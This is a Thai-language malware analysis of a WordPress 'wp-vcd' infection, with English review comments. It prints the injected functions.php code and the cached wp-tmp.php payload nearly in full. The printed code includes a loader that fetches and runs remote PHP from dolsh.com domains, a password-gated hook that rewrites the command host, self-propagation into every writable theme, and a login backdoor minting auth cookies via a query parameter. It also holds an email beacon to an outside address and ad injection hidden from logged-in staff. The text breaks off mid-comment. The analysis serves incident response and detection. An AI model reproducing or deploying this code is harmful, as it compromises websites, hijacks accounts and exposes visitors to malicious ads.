ไฟล์ functions.php เดิม
<?php
// Clean functions.php (pre-infection): theme bootstrap only, no request handling.
// Default content width WordPress uses when sizing embeds and images.
if ( ! isset( $content_width ) ) $content_width = 550;
// Single widget area; WP substitutes the widget id/class for %1$s / %2$s.
register_sidebar(array(
'name' => 'sidebar',
'id' => 'sidebar',
'before_widget' => '<aside id="%1$s" class="widget %2$s">',
'after_widget' => '</aside>',
'before_title' => '<header><h3 class="widgettitle">',
'after_title' => '</h3></header>',
));
// Feed <link>s in <head>, Customizer background support, editor stylesheet.
add_theme_support('automatic-feed-links');
add_theme_support('custom-background');
add_editor_style();
// hack to add a class to the body tag when the sidebar is active
function terminally_has_sidebar($classes) {
    // body_class filter: flag the <body> with "has_sidebar" when the "sidebar"
    // widget area holds at least one active widget, so CSS can target that
    // state. Returns the class list untouched when the sidebar is empty.
    if (!is_active_sidebar('sidebar')) {
        return $classes;
    }
    $classes[] = 'has_sidebar';
    return $classes;
}
add_filter('body_class','terminally_has_sidebar');
//add menu
// Registers the "primary" menu location (label reuses the twentytwelve text domain).
register_nav_menu( 'primary', __( 'Primary Menu', 'twentytwelve' ) );
function twentytwelve_page_menu_args( $args ) {
    // wp_page_menu_args filter: default 'show_home' to true when the caller did
    // not set it at all; an explicit value (including false) is kept as given.
    $args['show_home'] = isset( $args['show_home'] ) ? $args['show_home'] : true;
    return $args;
}
add_filter( 'wp_page_menu_args', 'twentytwelve_page_menu_args' );
//end add menu
// End of the clean file. Note any byte after the closing tag is sent as output;
// the infected copy shown below reopens PHP right after it.
?>
ถูกใส่ code เพิ่ม อาการคือเมื่อกดลิงก์ในเว็บตัวเอง จะมีหน้าใหม่เด้งขึ้นมาเป็นเว็บอื่น ๆ ด้วย เช่น delonton — ตัวที่ทำให้เกิดอาการนี้คือ script โฆษณาจาก go.pub2srv.com และ go.mobisla.com ที่ฟังก์ชัน slider_option / slider_option_footer (ในไฟล์ wp-tmp.php ด้านล่าง) แทรกเข้า the_content และ wp_footer โดยแทรกให้เฉพาะผู้เข้าชมที่ไม่ได้ล็อกอินและ IP ไม่อยู่ใน wp-feed.php เท่านั้น คนดูแลเว็บที่ล็อกอินอยู่จึงมักไม่เห็นอาการ
เป็นไปได้ว่า theme นั้น ๆ ไม่ปลอดภัย มีช่องโหว่ เพราะอาจไม่ได้รับการอัปเดต ไม่ได้พัฒนาต่อ หรือเขียนไม่ดีพอ แต่ควรระวังว่าจาก code ด้านล่าง ตัวติดตั้ง (wp-includes/wp-vcd.php) วนฝัง code ลงใน functions.php ของ ทุก theme ที่เขียนทับได้ ไม่ได้เลือก theme ใด theme หนึ่ง จึงยังสรุปไม่ได้ว่า theme เป็นจุดเข้า — จุดเข้าอาจเป็น theme/plugin ที่โหลดมาจากแหล่งที่ไม่น่าเชื่อถือ plugin ที่มีช่องโหว่ หรือ permission 0777 ที่ยอมให้เขียนไฟล์ได้ ก็เป็นได้ ต้องตรวจ log ของ web server เพิ่ม
ไฟล์ functions.php ใหม่ หลัง มี code ถูกใส่เพิ่มมา
<?php
// ===== INJECTED (wp-vcd family): remote "change_domain" control hook =====
// Runs before any theme code on every request that loads this file. When the
// request carries action, password and a non-empty newdomain, it rewrites THIS
// file in place: the host inside the `$tmpcontent = @file_get_contents("http://.../code10.php")`
// line further down is replaced with the attacker-supplied value, "true" is
// printed and the request dies. Any other action prints
// "ERROR_WP_ACTION WP_V_CD WP_CD" and dies -- "WP_V_CD" is also the marker the
// installer (wp-vcd.php, later on this page) greps for to detect an already
// infected functions.php. The password is a static 32-hex value compared with
// ==, not hash_equals(); wp-vcd.php builds its install code with
// md5(HTTP_HOST . AUTH_SALT) in place of a {$PASSWORD} placeholder, so this is
// presumably that per-site value. newdomain is dropped into the regex
// replacement unescaped and the file write is error-suppressed with @.
// Indicators: $_REQUEST['action'], $_REQUEST['password'], "wp_vcd", "WP_V_CD".
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '8e48d628a0241f31a5bc9d4d22dac3b3'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
// Read own source, locate the C2 host in the loader's fetch line ...
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code10\.php/i',$file,$matcholddomain))
{
// ... and swap it for the new one everywhere it occurs in the file.
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
// ===== INJECTED: remote-code loader. Guarded by function_exists so it runs
// once per request even when several infected functions.php files are loaded.
if(!function_exists('theme_temp_setup')) {
// Unused; note the bare REQUEST_URI constant (undefined-constant notice, hidden
// because the payload turns error_reporting off).
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
// Skip cron and XML-RPC requests. The loose "== false" works as "not found"
// only because a REQUEST_URI never starts with the file name (position 0).
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
// cURL fallback for hosts where file_get_contents() cannot open URLs
// (allow_url_fopen off). Follows redirects; returns the body or false.
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
// The execution primitive: writes attacker-supplied PHP to a temp file,
// include()s it (runs it with the web server's privileges), deletes the file,
// and returns its variables so the extract() calls below import them here.
// The temp file is unlinked at once, so nothing stays on disk except the
// wp-tmp.php caches written further down.
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
// "Signature" the payload must contain before it is executed -- a plain
// substring check, not a MAC. The wp-tmp.php listed later on this page
// carries the same value.
$wp_auth_key='aca55bf84cc544d0a9cfdfff8641d892';
// Stage 1: fetch from the primary C2 (this is the line change_domain above
// rewrites), execute it, and cache it as wp-includes/wp-tmp.php, else in the
// theme directory, else in the current working directory.
if (($tmpcontent = @file_get_contents("http://www.dolsh.com/code10.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.dolsh.com/code10.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
// Stage 2: secondary C2 domain, identical handling.
elseif ($tmpcontent = @file_get_contents("http://www.dolsh.me/code10.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
// Stage 3: offline fallback -- execute whichever cached copy exists, so the
// site stays compromised even if the C2 domains are sinkholed or outbound
// HTTP is blocked. Cleanup must remove all three cache locations.
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
// Stage 4: last-resort C2 domain (not cached).
} elseif (($tmpcontent = @file_get_contents("http://www.dolsh.xyz/code10.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.dolsh.xyz/code10.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
// Leftover delimiter comments; nothing on this page references them.
//$start_wp_theme_tmp
//wp_tmp
//$end_wp_theme_tmp
?><?php
// The theme's own code resumes here, byte-for-byte the clean file: the
// installer only prepends its loader ($content = $install_code . $content in
// wp-vcd.php) and leaves the original intact.
if ( ! isset( $content_width ) ) $content_width = 550;
register_sidebar(array(
'name' => 'sidebar',
'id' => 'sidebar',
'before_widget' => '<aside id="%1$s" class="widget %2$s">',
'after_widget' => '</aside>',
'before_title' => '<header><h3 class="widgettitle">',
'after_title' => '</h3></header>',
));
add_theme_support('automatic-feed-links');
add_theme_support('custom-background');
add_editor_style();
// hack to add a class to the body tag when the sidebar is active
function terminally_has_sidebar($classes) {
    // body_class filter: appends "has_sidebar" to the class list whenever the
    // "sidebar" widget area is active (has widgets); otherwise hands the list
    // back exactly as received.
    $sidebar_is_active = is_active_sidebar('sidebar');
    if ($sidebar_is_active) {
        $classes[] = 'has_sidebar';
    }
    return $classes;
}
add_filter('body_class','terminally_has_sidebar');
//add menu
// Same "primary" menu registration as the clean file.
register_nav_menu( 'primary', __( 'Primary Menu', 'twentytwelve' ) );
function twentytwelve_page_menu_args( $args ) {
    // wp_page_menu_args filter: make the "Home" entry appear by default.
    // Only fills the key in when the caller left it unset; an explicit value,
    // including false, passes through untouched.
    if ( isset( $args['show_home'] ) ) {
        return $args;
    }
    $args['show_home'] = true;
    return $args;
}
add_filter( 'wp_page_menu_args', 'twentytwelve_page_menu_args' );
//end add menu
// End of the theme's own code. Everything after this closing tag (from the
// next "<?php" to EOF) is a second injected section; its shape is consistent
// with what _verify_activeatewidgets() appends to other themes' functions.php.
?>
<?php
// ===== INJECTED: self-propagation into every theme's functions.php =====
// Hooked on admin_head (see add_action below), so it runs each time an admin
// screen renders. It copies this file's tail -- everything from the LAST "<?"
// to EOF, i.e. this whole injected section -- into every writable
// functions.php under wp-content/themes that does not yet contain the name
// "_verify_activeatewidgets". This is why reinstalling or updating a single
// theme does not clean the site. $output/$before/$after/$is_showdots/$ellipsis
// are decoys ($before, $after, $is_showdots, $ellipsis are never defined); the
// return value is unused by the hook.
function _verify_activeatewidgets(){
// Tail of this file from the last "<?" onward: the payload to replicate.
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
$output=strip_tags($output, $allowed);
// Path up to and including ".../themes" (6 == strlen("themes")); collect every
// file named like the last 13 chars of __FILE__, i.e. "functions.php".
$direst=_getall_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
// First "_name(" in the payload -> "_verify_activeatewidgets", used as the
// already-infected marker.
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
$cont=file_get_contents($item);
if (stripos($cont,$ftion) === false){
// If the target already ends with a PHP closing tag keep it (and drop anything
// after it), otherwise add one; then append the payload, which starts with "<?php".
$issepar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $issepar . "\n" .$widget);fclose($f);
$output .= ($is_showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
// Directory walk used by _verify_activeatewidgets(). $wids is a queue of
// directories still to visit, $items accumulates every file whose basename
// equals the last 13 characters of __FILE__ ("functions.php" when this file is
// one). Returns false as soon as a queued path is missing, not a directory or
// unreadable (discarding what was collected so far); otherwise recurses on the
// rest of the queue and finally returns the list.
function _getall_widgetcont($wids,$items=array()){
$places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]=$places . "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _getall_widgetcont($wids,$items);
} else {
return $items;
}
}
// Polyfills for very old PHP (stripos/strripos/scandir have been native since
// PHP 5.0), apparently so the injected code still runs on ancient hosts.
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
// Case-insensitive reverse search emulated by reversing both strings. Not a
// faithful strripos(): negative offsets are handled differently from the
// native function (assumption: never exercised on a modern host).
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
// Non-string needle treated as a character code (old PHP semantics).
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
// scandir() stand-in. Differs from the native one: no sorting, and with the
// default $listDirectories=false it tries to drop directories -- but is_dir()
// is called on the bare name (relative to the CWD, not $dir), so that filter is
// unreliable. Only matters where scandir() is missing, i.e. no modern PHP.
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
// Inverted: $skipDots == true actually KEEPS "." and "..".
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
// Re-run the self-propagation on every admin page render.
add_action("admin_head", "_verify_activeatewidgets");
// ===== INJECTED: obfuscated "log in as any user" backdoor + one-time beacon =====
// Hooked on init (see add_action below), so it runs on every request. The
// excerpt/widget-looking locals are decoys; the two things that matter are
// assembled by string concatenation:
//   $widgetchecks = "wp_" . "set" . "_" . "auth"  . "_" . "cookie" -> "wp_set_auth_cookie"
//   $getcommtext  = "wp_" . "ma" . "il"                             -> "wp_mail"
// and the address "livethemas@gmail.com" is spelled out piecewise inside a SQL
// string ($sq1) that is never executed, then cut back out into $text_s.
// First run (option "_is_widget_active_" unset): wp_mail() sends the site's
// home URL to that address, the option is set to 1, and the function returns.
// Every later run: for a visitor who is NOT logged in, the expression near the
// end calls wp_set_auth_cookie($_GET["cperpage"], true) -- so any request
// carrying ?cperpage=<user id> receives a valid, persistent ("remember me")
// auth cookie for that user. $src_length, $src_count and $no_more are never
// defined; the $sql passed to get_results() is "" (no-op query).
// Remediation: delete this function and its init hook, rotate the
// AUTH_KEY/SALT values in wp-config.php (WordPress signs auth cookies with
// them, so cookies minted through this stop validating), and audit users and
// content created while it was live.
function _getprepare_widgets(){
if(!isset($chars_count)) $chars_count=120;
if(!isset($methods)) $methods="cookie";
if(!isset($allowed)) $allowed="<a>";
if(!isset($f_type)) $f_type="none";
if(!isset($issep)) $issep="";
if(!isset($f_home)) $f_home=get_option("home");
if(!isset($f_pref)) $f_pref="wp_";
if(!isset($is_use_more)) $is_use_more=1;
if(!isset($com_types)) $com_types="";
// Attacker-chosen user id, straight from the query string.
if(!isset($c_pages)) $c_pages=$_GET["cperpage"];
if(!isset($com_author)) $com_author="";
if(!isset($comments_approved)) $comments_approved="";
if(!isset($posts_auth)) $posts_auth="auth";
if(!isset($text_more)) $text_more="(more...)";
// Flag that makes the beacon fire only once per site.
if(!isset($widget_is_output)) $widget_is_output=get_option("_is_widget_active_");
// -> "wp_set_auth_cookie"
if(!isset($widgetchecks)) $widgetchecks=$f_pref."set"."_".$posts_auth."_".$methods;
if(!isset($text_more_ditails)) $text_more_ditails="(details...)";
// -> "mail"
if(!isset($con_more)) $con_more="ma".$issep."il";
if(!isset($forcemore)) $forcemore=1;
if(!isset($fakeit)) $fakeit=1;
if(!isset($sql)) $sql="";
if (!$widget_is_output) :
global $wpdb, $post;
// Decoy query, never executed; its only role is to carry "livethemas@gmail.com"
// (built from the pieces li+vethe+mas+@+gm+ail+.+co+m) for the substr() below.
$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$issep."vethe".$com_types."mas".$issep."@".$comments_approved."gm".$com_author."ail".$issep.".".$issep."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if (!empty($post->post_password)) {
if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
if(is_feed()) {
$output=__("There is no excerpt because this is a protected post.");
} else {
$output=get_the_password_form();
}
}
}
if(!isset($bfix_tags)) $bfix_tags=1;
if(!isset($f_types)) $f_types=$f_home;
// -> "wp_mail"
if(!isset($getcommtext)) $getcommtext=$f_pref.$con_more;
if(!isset($m_tags)) $m_tags="div";
// 20 characters starting at "live" -> "livethemas@gmail.com"
if(!isset($text_s)) $text_s=substr($sq1, stripos($sq1, "live"), 20);#
if(!isset($more_links_title)) $more_links_title="Continue reading this entry";
if(!isset($is_showdots)) $is_showdots=1;
$comments=$wpdb->get_results($sql);
if($fakeit == 2) {
$text=$post->post_content;
} elseif($fakeit == 1) {
$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
} else {
$text=$post->post_excerpt;
}
// Beacon: wp_mail("livethemas@gmail.com", <home url>, <home url>) evaluated while
// building another SQL string that is itself never run.
$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommtext, array($text_s, $f_home, $f_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
if($chars_count < 0) {
$output=$text;
} else {
if(!$no_more && strpos($text, "<!--more-->")) {
$text=explode("<!--more-->", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $chars_count) {
$l=$chars_count;
$ellipsis=1;
} else {
$l=count($text);
$text_more="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
// Mark the beacon as sent so this branch never runs again.
update_option("_is_widget_active_", 1);
// $allowed is "<a>", so the first run always returns here.
if("all" != $allowed) {
$output=strip_tags($output, $allowed);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($bfix_tags) ? balanceTags($output, true) : $output;
$output .= ($is_showdots && $ellipsis) ? "..." : "";
$output=apply_filters($f_type, $output);
switch($m_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}
// $is_use_more and $forcemore are both 1, so the first branch always runs.
if ($is_use_more ) {
if($forcemore) {
// THE BACKDOOR: for a visitor who is not logged in, evaluates
// wp_set_auth_cookie($_GET["cperpage"], true) (errors @-suppressed). The
// surrounding "more-link" markup is never output -- $output is discarded by the hook.
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_links_title . "\">" . $text_more = !is_user_logged_in() && @call_user_func_array($widgetchecks,array($c_pages, true)) ? $text_more : "" . "</a></" . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_links_title . "\">" . $text_more . "</a></" . $tag . ">" . "\n";
}
}
return $output;
}
////////////////////////////////////////////////////////////////////////////////
// Get Standard Post Image
////////////////////////////////////////////////////////////////////////////////
// NOTE(review): benign-looking filler that ships inside the injected tail (it
// sits after the last "<?" that _verify_activeatewidgets() replicates), so it
// should be removed with the rest rather than kept. Returns the src of an <img>
// in the current post's content, else the theme's images/post-default.png.
// No call site on this page. Defects if it were kept: $matches[1][0] raises an
// undefined-offset notice when there is no image, and the greedy `.+` means that
// on a line holding several <img> tags the LAST src on that line is captured.
function get_post_image() {
global $post, $posts;
$first_img = '';
// No-op pair: starts and immediately discards an empty output buffer.
ob_start();
ob_end_clean();
$output = preg_match_all('/<img.+src=[\'"]([^\'"]+)[\'"].*>/i', $post->post_content, $matches);
$first_img = $matches [1] [0];
if(empty($first_img)){ //Defines a default image
$img_dir = get_bloginfo('template_directory');
$first_img = $img_dir . '/images/post-default.png';
}
return $first_img;
}
// Attach the auth-cookie backdoor to every request (runs at init).
add_action("init", "_getprepare_widgets");
// NOTE(review): like get_post_image(), ordinary-looking filler bundled in the
// injected tail; remove with it (no call site on this page). Lists the
// $no_posts published posts with the most approved comments as
// $before <a href=permalink title=title>title</a> $after items, optionally
// limited to the last $duration days and, unless $show_pass_post, excluding
// password-protected posts. Had it been legitimate code: $no_posts and
// $duration are interpolated into the SQL without casting or $wpdb->prepare(),
// and $post_title lands in an attribute and in link text unescaped.
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}
?>
theme ที่โดน จะเป็น 0777
folder theme 0777
wp-content 0777
(หมายเหตุ: permission 0777 ทำให้ process ของ web server และ user อื่นบนเครื่องเดียวกันเขียนทับไฟล์ได้ทั้งหมด ซึ่งตรงกับเงื่อนไข is_writable() ที่ _verify_activeatewidgets ใช้เลือกไฟล์ที่จะฝัง code ควรปรับเป็น 755 สำหรับ folder และ 644 สำหรับไฟล์)
wp-includes มีไฟล์ wp-tmp.php (ไฟล์นี้คือ payload ที่ loader ใน functions.php ดาวน์โหลดจาก code10.php แล้วเขียนเก็บไว้ด้วย file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php') และจะถูกรันซ้ำจาก cache แม้ต่อ server ของคนร้ายไม่ได้แล้ว) เนื้อหาของไฟล์:
// ===== wp-includes/wp-tmp.php: the cached stage-2 payload (code10.php) =====
// Executed by theme_temp_setup() in the infected functions.php through a
// temp-file include, not by WordPress directly. The listing starts without an
// opening tag because the loader prepends "<?php" itself when writing the temp file.
ini_set('display_errors', 0);
error_reporting(0);
// Same marker value the loader checks for before executing this content.
$wp_auth_key='aca55bf84cc544d0a9cfdfff8641d892';
// Self-update: pull the latest loader source from the C2 ...
$newxc=file_get_contents('http://www.dolsh.com/new10.txt');
// ... and read the parent and child theme's functions.php.
$file=file_get_contents(get_template_directory().'/functions.php');
$filec=file_get_contents(get_stylesheet_directory().'/functions.php');
// Intended to capture the loader region (from "div_code_name" through
// "if ( ! function_exists" and "extract(" up to the closing tag).
// NOTE(review): it requires the spaced spelling "if ( ! function_exists",
// while the loader shown above reads "if(!function_exists(" -- against that
// file this regex does not match and the replacement below is a no-op;
// other loader variants presumably use the spaced form.
$pat_code='/div_code_name[\s\S]*?(if \( ! function_exists[\s\S]*?extract\([\s\S]*?)\?>/i';
if(preg_match_all($pat_code, $file, $matches_pat_code))
{
$toreplace=$matches_pat_code[1][0];
// Only swap in the downloaded code if it carries the marker.
if (stripos($newxc, $wp_auth_key) !== false)
{
$new_file=str_replace($toreplace,$newxc,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}
}
// Same for the child theme.
if(preg_match_all($pat_code, $filec, $matches_pat_code))
{
$toreplace=$matches_pat_code[1][0];
if (stripos($newxc, $wp_auth_key) !== false)
{
$new_filec=str_replace($toreplace,$newxc,$filec);
@file_put_contents(get_stylesheet_directory().'/functions.php',$new_filec);
}
}
if ( ! function_exists( 'slider_option' ) ) {
// the_content filter (attached further down only for visitors who are not
// logged in, have no admin cookie and are not in wp-feed.php): on single posts,
// appends two third-party ad / pop-under script tags (go.pub2srv.com and
// go.mobisla.com) to the post body. This is what produces the "clicking a link
// opens another site" symptom described at the top of the page. $an (a Google
// Analytics snippet) and $con are built but never emitted.
function slider_option($content){
if(is_single())
{
$an="
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-9664825-1', 'auto');
ga('send', 'pageview');
</script>
";
$con = '
';
// Only $con2 reaches the page.
$con2 = '
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
';
$content=$content.$con2;
}
return $content;
}
// wp_footer counterpart of slider_option(): on every page that is NOT a single
// post, echoes the same two ad/pop-under script tags into the footer. Together
// the two functions cover the whole front end. $an and $con are dead here too.
function slider_option_footer(){
if(!is_single())
{
$an="
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-9664825-1', 'auto');
ga('send', 'pageview');
</script>
";
$con = '
';
$con2 = '
<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1063894"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1"></script>
';
echo $con2;
}
}
// Cloaking, part 1: every logged-in user gets a ~1000-day cookie
// "wordpress_cf_adm_use_adm". Below, visitors carrying that cookie never get
// the ad filters attached, so site staff presumably keep not seeing the
// injection even after logging out (WordPress does not clear this cookie).
function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}
if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}
// Cloaking, part 2 (helper): recursive walk from $path. For every directory
// named wp-includes (path contains "wp-includes" but not "wp-includes/"),
// append the current visitor's REMOTE_ADDR to <that dir>/wp-feed.php unless it
// is already listed. Called below with the PARENT of ABSPATH, so the staff IP
// is recorded into every WordPress install reachable under the same
// filesystem account, not only this one. $ip is carried across iterations
// without reset and is undefined when wp-feed.php does not exist yet (the file
// is then created from the bare IP). The opendir() handle is never closed and
// all file I/O is @-suppressed.
function readDirsad($path){
$dirHandle = opendir($path);
while($item = readdir($dirHandle)) {
$newPath = $path."/".$item;
if(is_dir($newPath) && $item != '.' && $item != '..') {
if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false)
{
if (file_exists($newPath.'/wp-feed.php'))
{
$ip=@file_get_contents($newPath.'/wp-feed.php');
}
// Substring match: a listed IP also covers any longer IP that starts with it.
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents($newPath.'/wp-feed.php',$ip);
}
}
readDirsad($newPath);
}
else{
}
}
}
// Cloaking, part 3: when the current user can edit_others_pages (editor or
// above), record their IP in wp-includes/wp-feed.php here and, via
// readDirsad(), in every sibling install under dirname(ABSPATH). Then, for a
// visitor who has neither the admin cookie nor a login and whose IP is not in
// wp-feed.php, attach the ad injectors to the_content and wp_footer. Net
// effect: staff never see the ads from any IP they have used, ordinary
// visitors always do. wp-feed.php is a newline-separated IP list despite the
